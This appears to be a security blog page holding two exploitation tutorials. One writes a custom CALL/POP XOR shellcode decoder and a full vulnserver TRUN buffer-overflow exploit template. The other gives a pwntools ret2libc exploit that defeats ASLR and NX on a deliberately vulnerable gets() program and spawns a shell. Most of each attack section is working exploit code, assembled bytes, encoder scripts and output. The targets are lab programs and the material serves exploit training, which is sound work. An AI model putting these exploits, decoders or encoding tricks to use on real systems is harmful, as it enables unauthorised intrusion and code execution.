
Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

Published: 2026-01-15

Author: JAKESWIZ

⛧ GitHub: fukahi-na-tekio ⛧


Introduction

This exploit technique was developed for the vulnserver TRUN buffer overflow, but it applies to other exploits as well, and should be especially useful to anyone new to exploiting x86/x64 code under ARM emulation.

The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 on ARM64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.

The Problem

When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), shellcode encoded with msfvenom's default x86 encoder (shikata_ga_nai) crashes inside its decoder stub:

eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012          xor     dword ptr [eax+12h],esi
Attempt to read from address 00000012

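The decoder dereferences a register that should hold its own address but instead holds 0x00000000 (EAX in this dump; EBP or ESI in other runs, since shikata_ga_nai randomizes its register choice), so the access lands on the unmapped near-null address 0x00000012.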

Why This Happens

shikata_ga_nai uses a GetPC technique relying on FPU (Floating Point Unit) instructions:

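fcmovb st, st(5)        ; Any non-control FPU instruction (its address becomes the FPU IP)
fnstenv [esp-0xc]       ; Save the 28-byte FPU environment; the FPU IP (offset 12) lands at [esp]
pop ebp                 ; EBP = saved FPU IP, i.e. the address of fcmovb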

On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field is often saved as zero. The pop then loads 0x00000000 into the decoder's base register, and the decoder's first memory access through that register faults.
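Why `[esp-0xc]`? In 32-bit protected mode FNSTENV writes a 28-byte image whose fourth dword (offset 12) is the FPU instruction pointer, so shifting the store down by 0xc puts that dword exactly at [esp] for the following pop. This Python sketch models only that memory layout, not the CPU; the ESP/FIP values are hypothetical.

```python
import struct

FIP_OFFSET = 12  # FPU instruction pointer slot in the 28-byte protected-mode image

def fnstenv_image(fip, fcw=0x037F, fsw=0x0000, ftw=0xFFFF):
    """28-byte FNSTENV image: FCW, FSW, FTW, FIP, FCS/opcode, FDP, FDS,
    each in a 4-byte slot. Only FIP matters for GetPC; the rest are placeholders."""
    return struct.pack("<7I", fcw, fsw, ftw, fip, 0, 0, 0)

def fnstenv_getpc(esp, fip):
    """Model 'fnstenv [esp-0xc]; pop ebp' and return the value popped into EBP."""
    image_base = esp - 0xC               # where fnstenv writes the image
    slot = esp - image_base              # pop ebp reads the dword at ESP...
    assert slot == FIP_OFFSET            # ...which is exactly the FIP slot
    return struct.unpack_from("<I", fnstenv_image(fip), slot)[0]

# Hypothetical values: a populated FIP, and the zero FIP described above
print(hex(fnstenv_getpc(0x089FF924, 0x089FF950)))  # 0x89ff950
print(hex(fnstenv_getpc(0x089FF924, 0)))           # 0x0
```

With FIP saved as zero, the decoder's `[reg+0x12]` access turns into the read of address 00000012 seen in the crash.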

The Solution: CALL/POP GetPC

Instead of relying on FPU quirks, use the reliable CALL/POP technique:

    jmp short call_label    ; Jump to the CALL
pop_label:
    pop esi                 ; ESI now contains address of encoded shellcode
    ; ... decoder logic ...
call_label:
    call pop_label          ; Pushes address of encoded shellcode, jumps back
    ; encoded shellcode starts here

When the CPU executes a CALL instruction, it pushes the address of the next instruction onto the stack. We immediately POP that address into a register. This is 100% reliable because CALL always pushes the return address; no FPU state is involved.
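Why does the CALL sit at the end and call backward? CALL rel32 stores a 32-bit displacement measured from the end of the 5-byte instruction. A short forward call has a small positive displacement padded with 0x00 bytes, while a backward call has a negative one padded with 0xff. This Python sketch encodes both cases (`call_rel32` is a hypothetical helper); the backward offsets match the small stub that follows.

```python
import struct

def call_rel32(call_addr, target):
    """Encode 'call target' (E8 rel32) placed at call_addr.
    rel32 is relative to the next instruction, i.e. call_addr + 5."""
    rel = target - (call_addr + 5)
    return b"\xe8" + struct.pack("<i", rel)

backward = call_rel32(15, 2)  # CALL at offset 15 back to POP ESI at offset 2
forward = call_rel32(0, 10)   # hypothetical forward CALL to a POP 5 bytes past it

print(backward.hex())  # e8eeffffff  (no null bytes)
print(forward.hex())   # e805000000  (three null bytes)
```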

Complete XOR Decoder Stub

For shellcode under 256 bytes:

    jmp short call_label    ; EB 0D: skip 13 bytes forward to the CALL
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cl, <length>        ; Shellcode length (patch this byte)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; ECX--, repeat while ECX != 0
    jmp short shellcode     ; Jump over the CALL into the decoded shellcode
call_label:
    call pop_label          ; Push address of shellcode, jump back to POP
shellcode:
    ; encoded shellcode here

Assembled bytes:

decoder_small = (
    b"\xeb\x0d"              # jmp short +13 (to call)
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\xb1\x00"              # mov cl, <length> - PATCH THIS BYTE
    b"\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6
    b"\xeb\x05"              # jmp short +5 (to shellcode)
    b"\xe8\xee\xff\xff\xff"  # call -18 (back to pop esi)
)
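Because every jump in the stub is relative, you can recompute the displacements from the instruction sizes instead of trusting hand-counted bytes. This Python sketch (hypothetical helper names, not from any tool) lays out the small decoder, derives each rel8/rel32 from the label offsets, and reproduces the bytes above with a sample length of 0x52 and key of 0x09.

```python
import struct

def rel8(next_ip, target):
    """Short-jump displacement: target minus the address after the jump."""
    d = target - next_ip
    if not -128 <= d <= 127:
        raise ValueError("target out of short-jump range")
    return struct.pack("<b", d)

def small_decoder(length, key):
    """Rebuild the small CALL/POP XOR stub, deriving every jump from the layout."""
    if not (1 <= length <= 0xFF and 1 <= key <= 0xFF):
        raise ValueError("length and key must each fit in one non-zero byte")
    # Label offsets (sizes: jmp 2, pop 1, xor 2, mov 2, xor byte 3, inc 1,
    # loop 2, jmp 2, call 5)
    POP, DECODE_LOOP, LOOP, JMP_SC, CALL = 2, 7, 11, 13, 15
    SHELLCODE = CALL + 5
    return b"".join([
        b"\xeb" + rel8(2, CALL),                      # jmp short call_label
        b"\x5e",                                       # pop esi
        b"\x31\xc9",                                   # xor ecx, ecx
        b"\xb1" + bytes([length]),                     # mov cl, <length>
        b"\x80\x36" + bytes([key]),                    # xor byte [esi], <key>
        b"\x46",                                       # inc esi
        b"\xe2" + rel8(LOOP + 2, DECODE_LOOP),         # loop decode_loop
        b"\xeb" + rel8(JMP_SC + 2, SHELLCODE),         # jmp short shellcode
        b"\xe8" + struct.pack("<i", POP - SHELLCODE),  # call pop_label (rel32)
    ])

print(small_decoder(0x52, 0x09).hex())
# eb0d5e31c9b15280360946e2faeb05e8eeffffff
```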

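For shellcode 256-65535 bytes (avoid lengths whose low byte is 0x00, such as 512 = 0x0200, which put a null byte into the stub; append a NOP to the shellcode before encoding if needed):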

    jmp short call_label    ; EB 0F: skip 15 bytes forward to the CALL
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cx, <length>        ; Shellcode length (patch these bytes, little endian)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; ECX--, repeat while ECX != 0
    jmp short shellcode     ; Jump over the CALL into the decoded shellcode
call_label:
    call pop_label          ; Push address of shellcode, jump back to POP
shellcode:
    ; encoded shellcode here

Assembled bytes:

decoder_large = (
    b"\xeb\x0f"              # jmp short +15 (to call)
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\x66\xb9\x00\x00"      # mov cx, <length> - PATCH THESE BYTES (little endian)
    b"\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6
    b"\xeb\x05"              # jmp short +5 (to shellcode)
    b"\xe8\xec\xff\xff\xff"  # call -20 (back to pop esi)
)
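Patching the placeholder bytes by hand is where most mistakes creep in. A minimal Python helper, assuming the two templates above byte-for-byte: the length byte sits at index 6 of the small stub, the little-endian length word at indices 7-8 of the large stub, and the key at index 9 or 11 respectively. `patch_decoder` is a hypothetical name, not part of any tool.

```python
import struct

# The two stub templates above, with placeholder bytes left as 0x00
DECODER_SMALL = (b"\xeb\x0d\x5e\x31\xc9\xb1\x00\x80\x36\x00"
                 b"\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff")
DECODER_LARGE = (b"\xeb\x0f\x5e\x31\xc9\x66\xb9\x00\x00\x80\x36\x00"
                 b"\x46\xe2\xfa\xeb\x05\xe8\xec\xff\xff\xff")

def patch_decoder(length, key):
    """Return the small or large stub with <length> and <key> filled in."""
    if not 1 <= key <= 0xFF:
        raise ValueError("key must be 1-255")
    if not 1 <= length <= 0xFFFF:
        raise ValueError("length must be 1-65535")
    if length <= 0xFF:
        stub = bytearray(DECODER_SMALL)
        stub[6] = length                       # mov cl, <length>
        stub[9] = key                          # xor byte [esi], <key>
    else:
        stub = bytearray(DECODER_LARGE)
        stub[7:9] = struct.pack("<H", length)  # mov cx, <length> (little endian)
        stub[11] = key                         # xor byte [esi], <key>
    if 0 in stub:
        # e.g. length 512 = 0x0200 puts \x00 into the mov cx operand
        raise ValueError("patched stub contains a null byte; pad the shellcode by one byte")
    return bytes(stub)

print(patch_decoder(324, 0x09).hex())
# eb0f5e31c966b9440180360946e2faeb05e8ecffffff
```

The output matches the decoder bytes used in the exploit template (length 324, key 0x09).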

Finding a Safe XOR Key

The XOR key must not appear anywhere in the original shellcode: b ^ key is 0x00 exactly when b == key, so every occurrence would become a null byte once encoded. Use this script:

#!/usr/bin/python3
import sys

def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)

    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            n = len(shellcode)
            print(f"Safe XOR key: 0x{key:02x}")
            # The low byte alone patches mov cl; both bytes (little endian) patch mov cx
            print(f"Shellcode length: {n} (0x{n:04x}, little endian: \\x{n & 0xff:02x}\\x{n >> 8 & 0xff:02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            for i in range(0, len(encoded_str), 64):   # 16 bytes per line
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded

    print("ERROR: No safe XOR key found!")
    return None, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)

    find_key_and_encode(sys.argv[1])

Complete Exploit Template

#!/usr/bin/env python3
import socket
import struct

target = '10.211.55.6'
port = 9999

prefix = b'A' * 2006                      # Offset to EIP
eip = struct.pack('<I', 0x625011af)       # JMP ESP address (\xaf\x11\x50\x62)
nopsled = b'\x90' * 16

# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    b"\xeb\x0f"              # jmp short to call
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\x66\xb9\x44\x01"      # mov cx, 0x0144 (324)
    b"\x80\x36\x09"          # xor byte [esi], 0x09
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6
    b"\xeb\x05"              # jmp short to shellcode
    b"\xe8\xec\xff\xff\xff"  # call back to pop esi
)

# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    b"\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)

# Pad the total payload to 3000 bytes
padding = b'F' * (3000 - len(prefix) - len(eip) - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)                              # consume the vulnserver banner
s.sendall(b'TRUN .' + payload + b'\r\n')
s.close()

Debugging Tips

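If the exploit still crashes, use WinDbg to step through the decoder:
1. bp <jmp_esp_address> (bp 625011af for the template above)
2. g
3. t 20 (traces 0x20 instructions, since WinDbg's default radix is 16)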

Common issues:
- Wrong jump offsets: The jmp and call offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes
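A small pre-flight check can catch the last two issues before you fire the exploit. This Python sketch (hypothetical function names; the example bad-character sets are placeholders, so substitute whatever your target actually filters) picks a key that avoids a whole bad-character set rather than only 0x00, reads the patched length back out of either stub template above, and compares it with the encoded payload.

```python
import struct

def find_key(shellcode, badchars=b"\x00"):
    """First XOR key whose own byte and encoded output avoid every bad char."""
    for key in range(1, 256):
        if key in badchars:
            continue  # the key byte is embedded in the decoder stub
        encoded = bytes(b ^ key for b in shellcode)
        if not any(b in badchars for b in encoded):
            return key, encoded
    return None, None

def stub_length(decoder):
    """Read the patched length back out of either decoder template."""
    if decoder[:2] == b"\xeb\x0d":  # small stub: mov cl, imm8 at index 6
        return decoder[6]
    if decoder[:2] == b"\xeb\x0f":  # large stub: mov cx, imm16 at indices 7-8
        return struct.unpack_from("<H", decoder, 7)[0]
    raise ValueError("unrecognised decoder stub")

def preflight(decoder, encoded, badchars=b"\x00"):
    """Return a list of problems; an empty list means the checks passed."""
    problems = []
    if stub_length(decoder) != len(encoded):
        problems.append(f"length field is {stub_length(decoder)}, "
                        f"but {len(encoded)} bytes are encoded")
    for name, blob in (("decoder", decoder), ("shellcode", encoded)):
        hits = sorted({b for b in blob if b in badchars})
        if hits:
            problems.append(f"{name} contains bad chars: "
                            + " ".join(f"{b:02x}" for b in hits))
    return problems
```

One thing this surfaces: the small stub's first instruction is \xeb\x0d, so a target that filters carriage returns (0x0d) will reject the stub itself, not just the shellcode.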

Summary

When msfvenom's encoders fail on modern Windows (specifically under Prism's x86 emulation on ARM), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.

Malware Bless


Bypassing ASLR & NX/DEP (Diving Deeper)

Published: 2023-11-01

Author: Jacob Swinsinski (0xXyc / JAKESWIZ)


Introduction

ASLR (Address Space Layout Randomization) randomizes the base addresses of shared libraries, the stack, and the heap. It does NOT move the binary itself unless it is compiled as a PIE (Position Independent Executable). ASLR was created to defeat memory corruption exploits that rely on hardcoded addresses.

Verify ASLR with ldd

ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
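ldd only shows the effect. On Linux the kernel's system-wide setting lives in /proc/sys/kernel/randomize_va_space: 0 disables randomization, 1 randomizes the stack, mmap base (shared libraries) and VDSO, and 2 additionally randomizes the heap (brk). A small Python reader, assuming a Linux host:

```python
from pathlib import Path

MODES = {
    0: "disabled",
    1: "conservative: stack, mmap base (shared libraries), VDSO",
    2: "full: conservative + heap (brk)",
}

def aslr_mode(path="/proc/sys/kernel/randomize_va_space"):
    """Return (value, description) for the kernel ASLR setting, or None if unavailable."""
    p = Path(path)
    if not p.exists():
        return None  # not Linux, or /proc is not mounted
    value = int(p.read_text().strip())
    return value, MODES.get(value, "unknown")

if __name__ == "__main__":
    print(aslr_mode())
```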

Bypassing ASLR: Three Methods

  1. Address leaking (covered here) - knowledge of PLT and GOT
  2. Relative addressing
  3. Bruteforcing

Vulnerable Code (aslr-1.c)

#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer);  // Vulnerable!

    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}

Compile with Docker (an older GCC toolchain, so the binary still contains the pop rdi; ret gadget used below)

docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1

Checksec Output

checksec aslr-1
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled        # Need ROP
    PIE:      No PIE (0x400000)
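checksec derives these lines from the ELF headers. As a rough illustration of where the PIE and NX results come from (not a replacement for checksec, and limited to 64-bit little-endian files), this Python sketch reads e_type (ET_DYN suggests PIE) and the PT_GNU_STACK program header (no PF_X flag means NX). `elf64_pie_nx` is a hypothetical helper.

```python
import struct

ET_DYN = 3
PT_GNU_STACK = 0x6474E551
PF_X = 0x1

def elf64_pie_nx(data):
    """Return (pie, nx) for a 64-bit little-endian ELF image given as bytes."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = False  # no PT_GNU_STACK header: treat as NX disabled (conservative)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return e_type == ET_DYN, nx
```

For the -no-pie build above, `elf64_pie_nx(open('aslr-1', 'rb').read())` should return `(False, True)`, matching checksec.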

Exploitation Strategy

Since NX is enabled, shellcode on the stack won't execute, so we need ROP (Return-Oriented Programming). Since ASLR is enabled, libc's address is unknown, so we need to understand the GOT (Global Offset Table) to leak it.

The GOT acts as a "dictionary" storing the addresses of external functions in libc. These values are filled in at runtime by the dynamic linker (ld.so).

Why puts()?

Calling puts() on puts@GOT prints the resolved address of puts inside libc, revealing where libc is mapped in memory.
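The arithmetic behind the leak, as a worked Python example. The three libc offsets below are assumptions for illustration: they are consistent with the addresses in the Result section of this post, but they differ between libc builds, so read the real values from your own libc (for example with pwntools' `libc.symbols`).

```python
PAGE = 0x1000

# Hypothetical offsets within one particular libc build
PUTS_OFF = 0x80E50
SYSTEM_OFF = 0x50D70
BINSH_OFF = 0x1D8698  # offset of the "/bin/sh" string

def libc_base_from_leak(leaked_puts, puts_off=PUTS_OFF):
    base = leaked_puts - puts_off
    # libc is mapped on a page boundary, so a wrong offset usually shows up here
    if base % PAGE:
        raise ValueError(f"base {base:#x} is not page-aligned: wrong libc or offset?")
    return base

leaked = 0x7FF4E0680E50  # the leak from the Result section
base = libc_base_from_leak(leaked)
print(hex(base))               # 0x7ff4e0600000
print(hex(base + SYSTEM_OFF))  # 0x7ff4e0650d70
print(hex(base + BINSH_OFF))   # 0x7ff4e07d8698
```

The page-alignment check is a cheap sanity test: if the low 12 bits of the computed base are not zero, the offset came from a different libc than the one the target loaded.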

View puts@GOT

objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5

Find puts@PLT (fixed address, unaffected by ASLR)

objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>

Find ROP Gadget (pop rdi; ret)

The System V x86-64 calling convention passes the first argument in the RDI register.

ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;

Find Offset with cyclic pattern

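gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash on ret! The pattern isn't a canonical address, so RIP can't hold it; check RBP, restored from the overwritten saved RBP
cyclic -l gaaaaaaa
# Result: Found at offset 48 (saved RBP)
# Offset + 8 (saved RBP) = 56 bytes of padding before the return address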
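The cyclic pattern is a de Bruijn sequence: every 8-character window occurs exactly once, so any 8 bytes recovered from a register map back to a unique offset. A dependency-free Python sketch of the standard recursive construction, using the same lowercase alphabet and window size 8 as the pattern above (pwntools' `cyclic`/`cyclic_find` provide this for real use; the functions here are stand-ins):

```python
from itertools import islice

def de_bruijn(alphabet="abcdefghijklmnopqrstuvwxyz", n=8):
    """Lazily yield the de Bruijn sequence B(len(alphabet), n)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def cyclic(length, n=8):
    return "".join(islice(de_bruijn(n=n), length))

def cyclic_find(sub, length=10_000, n=8):
    return cyclic(length, n).find(sub)

print(cyclic(24))               # aaaaaaaabaaaaaaacaaaaaaa
print(cyclic_find("gaaaaaaa"))  # 48
print(cyclic_find("haaaaaaa"))  # 56
```

The window right after the saved RBP ("haaaaaaa") sits at 56, which is the same padding length the exploit uses.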

Exploit Development: Three Stages

  1. Leak the libc address (puts@GLIBC)
  2. Obtain addresses and offsets
  3. Calculate the base address of libc

Automated Exploit with pwntools

#!/usr/bin/env python3
from pwn import *   # ELF, ROP, process, p64, u64, log, context

exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

p = process(exe.path)

# Stage 1: Leak libc address
padding = b'A' * 56                 # 48 bytes to saved RBP + 8 bytes of saved RBP

rop = ROP(exe)
rop.puts(exe.got['puts'])           # pop rdi; ret -> puts@GOT, then puts@PLT
rop.call(exe.symbols['main'])       # return into main for a second round
log.info("Stage 1 ROP Chain:\n" + rop.dump())

p.recvuntil(b'Enter some data:\n')
p.sendline(padding + rop.chain())

# The leak is the line puts() prints right after the program's own message
p.recvuntil(b'ASLR protection?\n')
leak = p.recvline()[:-1]            # strip the newline puts() appends
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")

# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base

rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]  # extra ret for 16-byte stack alignment
rop2.system(next(libc.search(b'/bin/sh\x00')))
log.info("Stage 2 ROP Chain:\n" + rop2.dump())

p.recvuntil(b'Enter some data:\n')
p.sendline(padding + p64(ret) + rop2.chain())

p.interactive()

What's Happening in the Code?

  1. Stage 1 ROP chain:
     - pop rdi; ret → pops the address of puts@GOT into RDI
     - puts@PLT → prints the bytes stored at puts@GOT (the libc address of puts) to STDOUT
     - main() → returns into main again, so the process doesn't exit and invalidate the leak

  2. Calculate the libc base:
     libc_base = leaked_puts - libc.symbols['puts']

  3. Stage 2 ROP chain (ret2libc):
     - ret instruction (for stack alignment)
     - pop rdi; ret → pops the address of "/bin/sh" into RDI
     - system() → executes /bin/sh
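Stage 1 is just 8-byte little-endian words laid out after the padding. Without pwntools' ROP helper, the same chain can be assembled with the standard library; the addresses below are taken from the Stage 1 dump in the Result section and only apply to the build that produced it. The local `p64` mirrors pwntools' function of the same name, and `parse_leak` is a hypothetical helper.

```python
import struct

def p64(value):
    """Pack an address as an 8-byte little-endian word (like pwntools' p64)."""
    return struct.pack("<Q", value)

PADDING = b"A" * 56      # 48 bytes to saved RBP + 8 bytes of saved RBP

# Addresses from the Stage 1 dump (non-PIE binary, so fixed across runs)
POP_RDI_RET = 0x40120B
PUTS_GOT    = 0x404018
PUTS_PLT    = 0x401030
MAIN        = 0x401142

stage1 = PADDING + b"".join(p64(x) for x in (
    POP_RDI_RET,   # pop rdi; ret -> RDI = next word
    PUTS_GOT,      # argument: address of puts@GOT
    PUTS_PLT,      # puts(puts@GOT) prints the resolved libc address
    MAIN,          # return into main() for the second stage
))

def parse_leak(line):
    """Turn the bytes puts printed (newline already stripped) into an address."""
    return int.from_bytes(line.ljust(8, b"\x00"), "little")
```

The null bytes in these addresses are harmless here because gets() stops reading only at a newline; an address containing 0x0a would be the real problem.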

Result

[*] Stage 1 ROP Chain:
    0x0000:         0x40120b pop rdi; ret
    0x0008:         0x404018 [arg0] rdi = got.puts
    0x0010:         0x401030 puts
    0x0018:         0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
    0x0000:   0x7ff4e062a3e5 pop rdi; ret
    0x0008:   0x7ff4e07d8698 [arg0] rdi = 140689715070616
    0x0010:   0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!

Key Takeaways

  1. Leak, don't guess - Use puts@GOT to leak a libc address
  2. Calculate base - Subtract known offset to find libc base
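  3. Return to main() - The process must not exit between the leak and the exploitation (a new process gets a freshly randomized libc)
  4. x64 requires pop rdi; ret - First argument goes in RDI
  5. Stack alignment - Add a ret gadget before system() on some systems; glibc's system() can crash if RSP is not 16-byte aligned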

ASLR is not a silver bullet. Understand the GOT. Become the exploit.



Malware Bless
